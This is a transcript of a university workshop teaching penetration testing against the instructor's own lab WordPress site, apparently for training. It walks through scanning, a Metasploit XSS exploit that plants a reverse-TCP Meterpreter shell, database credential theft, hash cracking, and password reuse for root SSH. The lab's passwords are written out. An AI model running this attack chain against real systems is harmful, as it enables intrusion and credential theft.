Hi guys, welcome everybody to a primer on pen testing given by hackers at Cambridge. Just before we start, does everybody have VirtualBox installed on their laptops? If you don't, this is probably a good time to get that installed. We've got some demonstrators here to help if you've got any issues. You'll also need the Kali Linux ISO. So let's get started. Pen testing. Well, we're going to be testing pens, right? So here you can see there's several types of pen. No, I'm joking. Pen testing is an attempt to evaluate the security of IT infrastructure by safely trying to exploit vulnerabilities. And that's the difference between pen testing and hacking. Hacking, you're trying to exploit systems to make money, to damage an organization, to put people in prison. With pen testing, you're trying to test the security of a system and hopefully improve it. You do this from a company's perspective because you want to prevent data breaches, you want to ensure you've got good security policies. Some types of companies, like credit card processors and banks, they have to do this by regulation. But more importantly, if you can prove to customers that you do security properly, then you'll get more customers and more business. So before we do any of that, we're going to have to establish the several steps to doing a successful pen test. So first we need to establish a goal. What data do we want to extract? Which servers are we going to attack? What's going to be our overall goal for the entire pen test? Then we're going to do some reconnaissance. Now reconnaissance, we're still not touching any of the systems. We're going to go on Facebook, we're going to check up the company, we're going to find out who the admin is, we're going to see if there's any related organizations. We're going to gather as much information as we can about the company in an attempt to improve the chances of success at our pen test. Then after we've done that, we're going to do some discovery. And this revolves around actually probing the systems that we're aiming to attack, discovering what services are running on them, if any of them are vulnerable, out of date. But we're also going to check out things like, is there a human connection? Very often, social engineering works incredibly well. After we've done that, we have a pretty clear plan of what we need to do. So we start the actual exploitation, which might involve brute forcing and social engineering. That gives us our first step into the system. From there, we can take control of the system and hopefully pivot into other systems, which allows us to take control of an entire network. And this is the point where you get the difference between a pen test and a hack. At the end, in a pen test, you want to collect everything you've done, put it together, send it off to the company to get it fixed. Hopefully, you'll then get paid for that. So, let's establish a goal. Our target is going to be a very large and very popular WordPress site. It's the only penreviews.ml. You should be able to go to this link. The DNS record should be correct. Hopefully that will just work. Let's have a look. Penreviews.ml. It's working? Good. All right. You can see it's a lovely website. It's got some very informative information on it. I'll leave you to poke around on it. So we want to gain access to the system and possibly access some secret data that we're not supposed to. That could allow a hacker full control of the system. Now we're going to stop one step before that. We're going to then try to fix it. So our first step is going to be reconnaissance. Anybody figured out who the admin is yet? Correct, me. Have you found out my email? Unless you already know my email, in which case it's a bit boring. There's hints on the website. There we go, on the About section. So that's one bit of information already. Hosting provider, well, we don't know very much about that. For all intents and purposes, it's my laptop at the moment. But what we do know is it's a WordPress site. There's various little clues all over the WordPress site. If you were to go to /wp-admin, you'd find a WordPress login page. So we're fairly certain it's a WordPress site. That means that there's a SQL database running somewhere, which is great. We can probably attack that. There's nothing about this company on Facebook, or at least I hope there isn't, unless I've got a fan page. And really the only human contact at this point is me. So from your perspective, you should be thinking, we're going to be attacking a website that's WordPress. Now, WordPress is known to be quite insecure. We'll find that out in the discovery stage. There's a SQL server running somewhere. There might be some other systems connected to this. And you'll perhaps have to do some social engineering on the sole admin. And also another point to note that this is quite a small website. So there's one person, one admin. That means that security practices probably aren't adhered to very well. You could have possibly one password for everything. It's worth keeping in mind. All right, so we're going to do some discovery now. Now for this, we're going to need to use Kali Linux. So you should have downloaded Kali Linux, the ISO, and VirtualBox. So we'll spin up VirtualBox. And you can ignore what I already have here. In fact, I'll delete it. Okay. So what you need to do is you'll need to go new, give your VirtualBox a name. I've called mine Kali Linux. The type needs to be Linux, and the actual version doesn't necessarily matter, but make sure it's 64-bit. If you're seeing 32-bit, call over a demonstrator, because it means your VirtualBox isn't set up right. So in my case, it's just sort of chosen generic Linux, which is okay. Just click Next. It's important to set at least 2 gigabytes of memory, which is 2048 meg. Will not work on 1 gig. And we don't actually need a hard disk, so we can skip that. So do not add. Yes, it warns you. We can ignore that. Cool. Once everybody's got that, we need to make some final little changes to the virtual machine. This is to make sure that our exploit works properly. So we'll go into Settings. We then need to go to Network. And you should see it's attached to NAT. Because of the way that the EduRoam network works, we need to set up some port forwarding rules. So we'll go to Advanced, and then Port Forwarding. So I'll just drag that there. Hopefully everybody can see that. And so what you'll need to do is you need to click the little green button. This is very difficult. And the first rule, so the two fields we need to change are host port and guest port. First one is 4444. Cool. And we add another rule. This is going to be 8080. So your Windows should look a bit like that. So we're just port forwarding those two ports. That's so that when we're running the exploit, the code can, the target server can reconnect back to us, so we can deploy a payload to it. Cool. We can then just close all of that. Yep, save settings. Then we'll start up the virtual machine. And you'll need to, at this point, find your Kali Linux ISO that you've downloaded. Should have a screen a bit like this. We'll just boot up into live mode. We don't need to install it or anything. Okay, my laptop's booted up. So, welcome to Kali Linux. Kali Linux is a Linux distribution designed for penetration testing and attacks of systems. It contains a whole suite of tools which are designed to help attack systems and gain access to them. So you'll find things like password brute forces, exploit suites, man-in-the-middle tools, reverse proxies, that sort of stuff. This is used both, it's used in the field by penetration testers who are employed, and unfortunately, because it's open source software and anybody can download it, it's also used by unsavory characters. But it's beneficial to us in this circumstance. So, what we'll need to do, first of all, we're in the discovery stage, so we want to do some port scanning. That's always your first step. Port scanning scans a target system and discovers what services it might have running. The tool we'll use for this is called Nmap. If you go to Applications, then Information Gathering, and just click Nmap. It'll give you a terminal. There is actually a GUI for this, but the terminal looks way cooler, so we're using this. Fun fact, actually, in many hacker movies, Nmap is used as one of their primary I am a hacker screens. So you are now a hacker, which is kind of cool. Right, so what we want to do, we want to scan the target system, which we know a host name for, and find if there's any services running on it. The command we'll need to use for that is nmap minus little v space minus little s capital V, and then our target. Like so. We'll just hit enter. Cool. So hopefully what you'll see there is that there's a bunch of open ports, and in fact Nmap has gone ahead and said it's made estimated guesses of what's actually running on those ports. So SV is service and versions. So it does the actual service scanning. The minus V, as you probably guess, is verbose. What we found is a handful of ports that are open on this system. So port 22, that's actually running on my laptop. Attack it all you want, but you won't get in. So then you also see port 4444 and port 8080. That's the virtual machine that I'm running, so again, not much point attacking that. But all of the other ports are quite interesting. So we see port 80 and 443. So that's HTTP and HTTPS, web server, basically. Now we already sort of knew that because we connected to it in the browser. But what Nmap has told us is that it's running Apache 2.4.10. In this case, that's moderately up to date. We can't really attack it. We've also noticed there's port 3306 open. This is quite interesting. That's actually MySQL. Again, moderately modern version of MySQL. Can't really attack it as any sort of bug in the system. But it's interesting that it's open, because that means we can connect to it later. This is one of the things that you'd probably send back to the company, that, you know, firewall your MySQL installation. You don't want to be opening up to the internet. But there's also another interesting one there, and that's port 2222. Now that's kind of non-standard. Nothing really runs on port 2222. Nmap is telling us SSH is running on that port. So that's something interesting to keep in note. In fact, let's try connecting to it. You know, it won't hurt. So what we'll run is SSH minus P 2222. I don't know, we don't have a username yet, but root is always a good one to try. American keyboards. I hate American keyboard layouts. It's Shift 2 on a UK keyboard, which is really awkward. So yeah, I was going to say that. Say yes. Okay. So it's actually asking us for a password. Okay, well, we don't know the password, so we'll just Control-C that. But that's interesting to note. So there's actually SSH, root access, available with a password, rather than public key authentication. That's kind of insecure. Well, bear that in mind for later. So that's that. So what we've already known so far is there's also a WordPress installation running on the web server. Now, WordPress is quite a common content management system, so there are scanners for it, which will scan for any known vulnerabilities. Conveniently, that scanner is called WP scan. So let's run that. WP scan --URL. Then we give the URL.
You must have the S for scan.
Ah, so I did. penreviews.ml --enumerate VP. So what that does is it will try and enumerate all vulnerable plugins. WordPress is based around the concept of plugins, so the scanner will actually try to enumerate all of them and see if any of them have known vulnerabilities in them. So let's hit enter. You'll have to update the database, which just tell it yes. Doesn't take a moment. Okay, so it's already finding some stuff. It's detected the version of WordPress. It's detected the theme. And now it's starting the enumeration. That'll take a moment. Any questions on what we've got to so far? Yep.
If, let's say, you did a penetration test on your own WordPress website, and you found out all this stuff, like how would you start going about closing some of this information off?
Well, this entire business is built around getting that information. You need to work, well, if you've got old versions of plugins, the obvious solution is update them. If there are unsupported versions of plugins, try to find alternatives, because they're likely insecure. The security, well, if you're doing penetration testing yourself, then it's a bit difficult. You'll sort of need to know what to do. But if you've got a company to do it for you, then they will advise you on the steps you need to take. So it's getting there. I think it's a handful of people all attacking the system, scanning the system at the same time is somewhat slowing it down. Yep.
So they've got a database of like plugins which are vulnerable. Then how do they actually define a vulnerability and how to test for it? Is that code, or how do you actually manage all these different possible things without having lots and lots of spaghetti code?
So when a vulnerability is found in a plugin or a piece of software, a report called a CVE is logged on the internet, and these are public. The WordPress, well, the WP scan people actually look at all of these CVEs for WordPress and put together a database of exactly which versions of a plugin are vulnerable to specific vulnerabilities and when it was patched. So what the scanner does is it tries to enumerate as many plugins as it can, detect their versions, and if their versions are less than a known good version, it says that they're vulnerable. Oh, I've never seen that before. Yeah, this is load testing 101. Yeah?
What does this scanning look like from the server's perspective? Really obvious.
So on a server that doesn't get much traffic, yes, it's really obvious. And in fact, you can firewall this stuff out. But on a really busy site, especially if you're sending scanning probes from multiple IP addresses, it's almost impossible to distinguish from real traffic. In fact, well, I'll start that back up again because I have to get it done. Oh, it's slowing down. This is really bad. Yeah, need more powerful computers next time. Can Hackers at Cambridge sponsor me a new laptop? Yes, so scanning. So there's actually an online utility called Shodan, which every few days will scan the entire internet. And by that I mean every single IPv4 address to try and find what vulnerable services are running on it. And you can search the database if you really want to. We'll actually be doing that at the end. It's pretty scary, the stuff that they find. They find things like insecure CCTV cameras that are just connected to the internet, no passwords. there was recently a thing with, if you've ever used MongoDB, which is a document-based database, it originally didn't support password authentication unless you paid Mongo a lot of money, and so nobody ran it with password authentication, but it was still connected to the internet. And so anybody could connect to your production database and just steal all your data. Thankfully, that's mostly stopped nowadays. Okay, so what WP-Scan has found is it's found a couple of plugins. The ASCII-MET is actually incorrectly found. That isn't actually enabled. But the other one is a 404 to 301 plugin. Version 2.2.8 is enabled on the server, but 2.3.1 was a fix for a quite serious vulnerability. In this case, an unauthenticated cross-site scripting attack. So cross-site scripting is where you can run code on a target website from a link to that website. In particular, if you can convince, say, the admin to run that code, then you're running as admin privileges, which is quite bad. And in the case of WordPress, admin privileges allow you to actually change PHP files on the server via the theme editor, so we can actually do remote code execution through this. So I think we found our attack vector. All right. So those are our results. We've got a WordPress instance. It's vulnerable to XSS. There's an SSH server on port 2222. It's got password authentication en route. And there's a MySQL server there as well. So this is what we're going to do. We're going to use the Metasploit framework, which is a exploit framework that helps you make... it can deliver a payload to a target and gain remote code execution or various other things. We're going to use that. We're going to access the web server. We're then going to gain the MySQL access credentials that the WordPress site uses to communicate with MySQL. We're going to connect to that, and we're going to dump the entire user database, which includes password hashes. Now, the problem with password hashes is that you can't reverse them. So we'll then do a brute force attack on those password hashes and hopefully gain a password which might be shared with other services. Now, if you remember, we had our SSH server running on a non-standard port, so perhaps it uses the same password for a single administrator system. It's not unusual for that to happen. I'm sure many of you use the same password for multiple services. This is one of the reasons why you shouldn't. So that's going to be our attack. So we're going to need to use some resources for this. If you go to hackersatcambridge.com/pentest, that will take you to a GitHub repo. We're just going to clone it into our virtual machine so that we have a copy. So git clone https github.com/hackersatcambridge/pentest. And so that's pulling a couple of files that we'll need later, including our Metasploit exploit and a password list. What you'll notice in here is we've got three main files. We've got a Ruby file, which is our Metasploit exploit. We'll have a look at that in a moment. We've got a password list, otherwise known as a dictionary. And we'll use that for the password hashing step. And then there's a handy script, which we need to run in a moment. Cool. So, let's do it. From our virtual machine. First thing we're going to do is we're going to use Metasploit to perform remote code execution through that vulnerability that we found onto the web server. For that, we're going to need to use an exploit written in Metasploit's Ruby language. Thankfully, I've already done this for you. So if you have a look at the WP 404 to 301 xss.rb file, I'm opening it here with nano, this is the Metasploit exploit that we'll be using. And actually, you can very often find exploits pre-written for you on the internet for many vulnerabilities. They're very simple to write, actually. After the generic blurb stuff at the top, there's two main functions. Check, which checks the server to see if it's vulnerable or not. In many cases, you can just skip this. In this case, it just makes sure the plugin's enabled and it's the right version. And if you go down a bit, there's an... Oh, I've gone past it. There's an exploit function, which is the function that gets run when you actually tell it to do the exploit. And so what it's doing in this case is... Oh, this scrolling is really bad. It's sending a request to a random URL, which would ordinarily trigger a 404 page. But because of that plugin, it tries to redirect us to a 301. And the way that the XSS works, if you look at any of the associated literature, WP Scan gave us some security listings about this, some CVEs. The way that it works is that there's unauthenticated inputs that come from that 404 redirect, that if you can cause the admin to go view the error log, then you can run arbitrary JavaScript, which is quite a serious vulnerability. And so what it does is it triggers a 404, causing a log entry to be created, but most importantly, it injects a script tag with a local, with a JS URL. And what this particular Metasploit module does is it pretends to be a web server, and you can see the web server running in the onRequest URI method. So what it does is on any request, it replies with a bunch of JavaScript, which, to spare you the details, it's slightly modified to support multiple users, but it rewrites the contents of the footer.php in the WordPress theme. So the next time you load any page on WordPress, it will execute whatever PHP you tell it to. In this case, a payload provided by Metasploit. That's basically what the exploit does. You can read the JavaScript if you want. This is how you'd write an exploit of your own. To actually use this, though, we need to put it in the right place. I don't know why Metasploit does this. The simple way of doing that is to run the linked script. So if we just run copy.sh, it puts it in the right place. If anybody ran that without actually checking what it did, yeah. Don't run unauthenticated scripts, guys. Cat it first. Now, in this case, I was okay. It didn't actually do very much. It just installed the file. But, you know, I could have just set up a reverse tunnel to your systems. So, yeah. I mean, you're a security workshop, guys. Come on. Yeah, well, what if it's not inside? What if it connects to your company's network? Then you're a bit screwed. Cool. So we've installed that to the right place. Before we go any further, though, I do need to actually just do some stuff, because after all of that scanning, there's a lot of stuff in the logs already, so I'm just going to go clear that. Here we go. Okay, so we've got our Metasploit module in the right place. Now let's start up Metasploit. For that, we use MSF console. We'll just run that. I'll start up the Metasploit framework. It contains a lot of exploits and a lot of payloads. Payloads for any sort of architecture you want, x86, over the SMB protocol or NTLM. There's HTTP reverse payloads, there's PHP payloads, obviously. So we're going to be using a PHP payload, which in this case causes the remote server to connect back to us and set up a remote shell, giving us remote code execution. It's being awfully slow at starting there. Here we go. All right. Welcome to Metasploit. It gives you a random message every time, which is kind of cute. We need to first of all tell it that we're going to be using our exploit. So, I wish I could get that bit higher. There we go. If we type in use exploit /Unix /web app /WP underscore, I'm going to use the tab key, 404 to 301 XSS. So with a bit of luck, you'll now be in the module. Now what we're going to do is we're going to type show options. So what show options does, it shows us every option that we could possibly set on this particular module. The important one here is our host. This is the target host that we're going to be attacking. So what we're going to do is we're going to type in set. Actually, let me just put it up a little bit. Set our host pen reviews.ml. Cool. Okay, hopefully everybody now sees this. A shell with WP404-2-301_XSS in the Metasploit console. So, if we run show options, again, this tells you all of the options that the module has available, for anybody that's still catching up. And the most important one that we need to set is our host. And we did that by running set our host pen reviews, if I can spell it, .ml. As you run that, it sets our host to the right value. If you run show options again, you can now see it's been set to the right value. Now the other options that are of note here are port. It's going to be connecting to port 80. In this case, that's fine. SRV host, we're telling it that we're listening on every interface. That's fine. We're listening on 8080. Now, if you remember, we port forwarded that on the virtual machine. That's because that's how the server will connect back into our Metasploit. And the rest of it doesn't really matter at this point. But what we need to do is we need to actually set a manual payload. It will by default select the PHP payload, but we need to configure it in special ways. So what we'll run is we'll run set payload php/meterpreter. Again, use the tab key because it will autocomplete for you. And if you double press tab, it gives you all available options. And so we're going to run set payload php/meterpreter/ bind_TCP. Cool, so at this point, if you run show options again, you'll notice that there are some more options available to us for the payload. And this is one that we have to... Oh no, have I chosen the wrong one? Okay, so what I've done there... Okay, slight change of plan. It's not bind TCP, it's reverse TCP. The reason that you have to use a different one is because we're running it in virtual machines and stuff. So yeah, just run that command again, but with the adjusted parameter. So now if you run show options, you'll notice that there's a new parameter, lhost. And we have to set this one to be, this is quite peculiar to our setup. This is how the server will connect back up to our Metasploit instance, but your virtual machine is natted behind your real machine. So what we now need to find is the real IP address of your computer. So on Linux, the way that you do that is if you open up a terminal, this is on your real machine, not on the virtual machine. You run IP-ADDR. Oh, mine has a lot. You should have an address, something like 10.248. something. On Windows, if you go to your adapter settings, you'll find it there. On Mac, it's ifconfig, or you click on the Wi-Fi. Either way, you're looking for an IP address that looks something like 10.248. something. In my case, it's .123.8. So what you need to do back in Metasploit is set lhost to be equal to that. So in my case, it's just that. Now, if you set yours to that, it's not going to work, because that's my IP address. You need to get your own IP address. lhost, it's the host that the target server will attack back. We just run show options again. This is what yours should look like, mostly, except the IP address will be different. Okay, we're now ready. So let's just run exploit. And there we go. Our exploit has now been delivered to the server, and we've got one more task. We just need to somehow convince the admin to go and view that error page, because there's now a injection on that error page that will cause arbitrary JavaScript to run as soon as the admin views it. And this is where the task is handed over to you. Convince me. You have my email address. I'm waiting for emails to convince me to browse to that page. Actually email me. I'm looking at my emails. You have my email address. Convince me to go view that 404 login page. If you need the email address, it's on the About page. I liked the attempt from Nathaniel before the workshop had even started to try and get my login details. So, yeah, that's quite funny. Yeah. Ah, Peter Budden is telling me that he can't load my famous pen reviews page. This is terrible. Yeah, apparently I'm known as Farty now, so that's great. So, you know, I'd better go check that it's working properly, right? We wouldn't want people not to be able to view our page. So, you know, if it's not working, well, it might be a 404. Let's have a look. Nothing there. Nothing there. Nothing there. Okay. Why has none of that worked? So what's supposed to happen at that point is that the exploit gets activated, but for some reason it hasn't. I don't know why.
Maybe it updates itself.
It has to be HTTP. Oh. I think I've been foiled by the HTTPS protection on Chrome. Ah, here we go. Load unsafe scripts. Yes, that's good. There we go. That's why it wasn't working. This is what happens when Google Chrome is too intelligent for its own good. All right. So, if you look at Metasploit now, you might see Meterpreter session 1 opened. If you don't, run exploit again, because the site can only load up a maximum number of exploits at any one time, and if it hasn't activated your one, then just run it again and hopefully it will work. I was quite lucky in that mine just worked. In fact, you know what? I'm going to go to here. I'm just going to keep pressing refresh. With a bit of luck, I'm launching everybody's exploits by just repeatedly refreshing.
How come the log entries are disappearing?
Because the exploit is coded such that it removes all of the log entries when it's finished. But besides, this page can only display, I think, about 10 at once. So the exploit's not really designed for 30 people using it at once. It's mainly designed for one person using it. Okay. Any more Meterpreter sessions opened?
So does that mean that from the admin's point of view, if this exploit happened to them, they would see that they'd go to their error log page, it would be completely blank, and then they just refresh and it'd appear again and they think nothing was wrong?
Not quite. The original exploit was coded such that the admin wouldn't even notice. I had to tweak it slightly to get it to attempt to work with multiple people, which hasn't been entirely successful. Any more exploits coming through? Okay, so in theory that would work on everybody's, but as you can see it's a little bit hit and miss at the moment. But in reality this is only one small step of the entire pen test. We can all continue in a moment. So if you had a Meterpreter session and the people who have them can follow along, everybody else just watch my screen. So you can now type in sessions, and sessions tells you all active sessions. In this case we've got one open, so we can connect to it by running sessions -i1, and now we've got interaction with our session. If we type in some basic commands, we can see we're connected to a Linux box, but most importantly, this is the directory listing on the web server. So we're actually now connected to the web server. If anybody's ever set up a WordPress instance themselves, they know that the important information is all stored in wp-config, which we can just read now, because we are the web server. We have remote code execution. So, Christian, do you want to write this up on the board? The important bits here are db user and db password, because we've just found ourselves database access credentials.
You just list that part.
I catted it. All right, so we're just going to exit out of that Meterpreter session, because we're done with Metasploit now. We've got our first access into the system. So what we're going to do is we are going to connect to MySQL. So from Kali Linux, run MySQL -h penreviews.ml -u WordPress, because that was the username that it was connecting as, -p, actually yeah, let's just type it all in one, wfx and wn f7 g2 f5. Still asks me for a password. Okay.
You have to put a space. There's no space after.
Is there no space? You just have to do that. Well, that's rubbish. Okay, well, apparently if you don't put a space between the -p and the password, it works. And so welcome to MySQL. So we've now infiltrated the entire database of the WordPress server. If we show databases, we see that there's a WordPress database. So if we go into that use WordPress, now you can type in show tables. And that shows all of the WordPress tables. There's one particular of interest, and that's WP users. Contains all of the user accounts on the server. To read the contents of that table, we're going to run select. Let me just... Oh, I can't. Oh, it's not working. We're going to run select star from WP_users. And that prints out the user accounts. Most importantly, the root user account. Can everybody see that? As I mentioned, it is hashed. This is a password hash. We can't reverse it. But what we can do is brute force it or attack it by a dictionary attack. So let's do that. So copy that password hash. You can do that by just selecting over the entire hash. As soon as it's selected, it's copied. And then we can exit out of MySQL. And now, if you follow this slightly cryptic series of commands, if you type in cat into... Yeah, sure. If you type in cat into hash.txt, it's now going to wait for some input. Now press Shift Insert. And that should paste it there. Everybody got that? You just press enter once more, and then press Control D. That should exit the file. So if you now cat that file, it contains our hash, and our hash only, which is exactly what we wanted. So we're going to run a password cracking utility called John the Ripper. It's invoked with John. It takes lots of options. Most important ones in this case are John --format equals phpass --word list equals 10 underscore, well, I really hate this. The problem is you need to put an equals, but it won't autocomplete if you do put the equals. So we're telling John to use a word list, so it's a dictionary attack. And then we're just going to crack our hash. The format is the format of the hash itself. So in this case, because it was a WordPress hash, which is PHP, it's phpass is the format. And so now it's going ahead and actually cracking the password for us. Now this word list contains 1 million passwords, the most million common passwords, as it happens. And even inside this virtual machine on my underpowered laptop, it's proceeding through it very quickly. This is why you don't use common passwords. So what it's trying to do is it's trying to hash every password in the list until it finds one that matches. Which takes a bit of time, but it's going fairly quickly. Yep.
So why doesn't the text file have a list of passwords and their hash? Like, why do we have to compute it now as opposed to before?
You have to recompute every hash because of a thing called salting. So before a password hash is saved into the database, or in fact before it's even hashed, it's combined with a random string called a salt. That salt is stored in the database, but the thing is it's different for every user. So this prevents you pre-generating a list of all possible hashes and then just comparing against those hashes. Instead, you're forced to calculate every hash individually, which is a lot slower on the part of an attacker.
So this means that if we had a bunch of users, we'd have to rerun this for each user separately.
Yes. All right, so we've now got a password. If anybody's following up to this stage, this is the password that you'll get, PlasticPen63. Who remembers about that SSH server that was running? Should we try connecting? Oh God, what am I doing? Oh, I hate keyboard layouts. I'm now connected to SSH with the password that I ran a dictionary attack on.
What was the password?
PlasticPen63. You can see it in the results of John the Ripper.
And that's the top 10 million of passwords.
Top 1 million passwords. Out of interest, who wants to take a guess at how many passwords there were containing the word penis in the top 1 million passwords? Any numbers? Throw some out there.
100,000.
No, not 10% of the entire sample. Thankfully, although I wouldn't be surprised. No, a lot less than that, unfortunately. It was only about 53. But that's still a lot. Poor show. Yeah. Needs more penis and passwords. Has everybody managed to connect to SSH with that password? So it's SSH -P2222, the non-standard port, root at penreviews.ml, password was plasticpen63. If you've connected, except mine's closed for some reason. What? Has somebody run shutdown? Have they? Has somebody really run shutdown? Yes, that is what's happened. Somebody has just told it to shut down. Okay, well, it should be back up now, so...
Don't run shutdown again.
Yeah. I mean, once is funny, but... Okay, so we're in, and we've got some .pem files. If anybody's ever set up a web server, these are HTTPS certificates. I'm not expecting you to type this, by the way. Specifically, this is the HTTPS certificate for penreviews.ml, signed by Let's Encrypt, so it's actually a valid SSL certificate. If with this code, you could impersonate penreviews.ml, which is pretty much, you can man in the middle it, you can steal login credentials, anything you want. This is the total control that we were talking about. Cool. Okay, so we've broken the system, we've taken full control, all your beta belong to us. What happens next? Well, if you're doing this as part of a bug bounty, which many companies do, it's where companies invite you to attack their code. They pay out money if you found a bug, but only if you do it responsibly. You have to disclose the bug to them without revealing it to the internet. They will then give you a reward, and as long as you give them, I think it's a 90-day disclosure period most of the time, to patch their systems and push out any deployments, then they will pay you for that, and you'll end up in their Hall of Fame, effectively. For smaller projects, there's a site called HackerOne, which supports penetration testing on smaller projects. If anybody's interested, I strongly recommend getting involved in that. You could also be employed. Companies employ real security professionals to pen test their systems every day, all day. Or you could be contracted by another company to do third-party pen testing. Of course, there's also black hat. You know, a vulnerability on this sort of level wouldn't really worth that much. A review site, who cares? On the scale of Google, there are many people who would pay a lot of money to be able to gain that sort of access on Google. But of course, if you do that, the police will probably come knocking on your door shortly after. If you want more, there's the Cybersecurity Society, and they're running 2 events, first of which you might have heard of, Cambridge to Cambridge. It's a capture the flag style competition between MIT and us. I mean, I'm sure we're going to win. If you're interested, registration is closed 15th of March, and there's a $20,000 prize. But more importantly, you get to own the other Cambridge. So, come on. And as a slightly smaller competition, it's between UK universities. There's Inter-ACE, which is actually used as one of the qualifying rounds for Cambridge to Cambridge. It's here. Both of them are actually here at the Computer Lab. So, if you want to get involved, do that. Thanks for the slightly haphazard at times workshop, but we got through it. If you've got any feedback, please leave some. It's super useful to us, any workshops that we're doing next. And this will eventually end up on YouTube as well. So if there's anything you missed, check out the YouTube link.